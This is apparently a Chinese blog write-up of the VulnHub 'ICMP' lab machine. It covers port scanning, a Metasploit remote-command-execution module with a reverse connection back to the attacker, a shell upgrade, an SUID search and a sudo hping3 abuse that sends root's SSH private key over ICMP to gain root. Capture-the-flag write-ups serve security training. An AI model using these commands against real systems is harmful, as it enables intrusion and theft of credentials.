vulnhub---ICMP 之 hping3提权

目录

下载链接

靶场搭建

信息收集

端口扫描

漏洞利用

ssh登录

Hping3提权


下载链接

官网链接:VulnHub

靶机下载链接:ICMP

靶场搭建

攻击机:kali IP:192.168.4.50

靶机:192.168.4.183

注意:如果靶机分不到IP的可以看我的另一篇文章靶机IP分配

信息收集

端口扫描

namp -A -sS -sV -T5 192.168.4.183

发现开放了两个端口,那么我们访问他的web服务。

漏洞利用

然后我就对其进行目录扫描,扫出来很多目录,但是全都没有作用,这里我就不展示了,那么就只能找找其他可以利于我们渗透的。于是我把主页的标题,搜索了一下你别说,还真就找到了。

那么就用这个漏洞执行远程命令执行

set rhosts 192.168.4.183

set TARGETURI /mon

set lhost 192.168.4.50

set lport 1234

run

好我们登录上去了那么我们就getshell。进入交互模式查看一下有哪些用户和拥有suid权限的文件

python -c "import pty; pty.spawn('/bin/bash')"

find / -user root -perm -4000 -print 2</dev/null

发现这个用户并没有可以提权的方式,发现有一个fox用户,那么我们试试登入fox用户,试着用fox用户进行提取。

发现了一个文件夹,两个文件,我们先查看两个文件。

local.txt里面是一段密文,我拿去解密,解不出来,那只能跳过了,reminder这个文件里大概就是让我们找一下crypt.php文件,我们先放一边,我们看看这个文件夹下有啥东西

发现没有权限查看,但是这里肯定东西, 说不定crypt.php就藏在这里,我们试着查看一下

ls -alhd crypt.php

发现还真有啊,那就查看一下吧

这个可能就是解密后的明文了,我们试着用这串明文ssh远程连接fox用户

ssh登录

进入了fox用户,看看fox可以利用sudo执行那些命令

发现可以利用hping3进行提权,通过sudo -l命令查看我们发现还得利用ICMP协议,那么就好办了,直接开始提权

Hping3提权

通过多次实验我发现利用普通的 hping3 提权方式,无法提权,我只好到网上去搜一搜教程了,发现可以利用hping3传输root用户的密钥,真是没想到,既然找到了方法,那就开始实验咯。

我们现在要有两个fox用户,一个用于接收,一个用于发送。

sudo hping3 --icmp 127.0.0.1 --data 5000 --sign sign --file /root/.ssh/id_rsa

sudo hping3 --icmp 127.0.0.1 --listen sign --safe

得到了密钥,我们将密钥拷贝下来,在kali上创建一个密钥文件,并命名为id_rsa文件。

ssh -i id_rsa root@192.168.4.183

咦?这里说id_rsa文件太开放了,好好好,那我们将id_rsa文件的权限改为600,在尝试远程链接

chmod 600 id_rsa

拥有root权限了,撒花。

  • 15
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值